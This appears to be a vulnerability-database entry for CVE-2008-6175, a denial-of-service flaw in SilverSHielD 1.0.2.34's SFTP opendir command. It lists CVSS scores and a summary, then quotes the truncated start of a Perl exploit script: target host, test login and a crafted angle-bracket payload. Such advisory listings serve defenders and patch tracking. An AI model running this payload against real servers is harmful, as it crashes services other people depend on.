5
CVSSv2

CVE-2008-6175

Published: 19/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

SilverSHielD 1.0.2.34 allows remote malicious users to cause a denial of service (application crash) via a crafted argument to the opendir SFTP command.

Vulnerable Product Search on Vulmon Subscribe to Product

k2sxs silvershield 1.0.2.34

Exploits

#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmailcom/jbrownsecblogspotcom] # SilverSHielD 10234 DoS use Net::SSH2; $host = "1921680111"; $port = 22; $username = "test"; $password = "test123"; $dos = "<<<<<<<<<<>>>>>>>>>>"; $ssh2 = Net::SSH2->new(); $ssh2->conne ...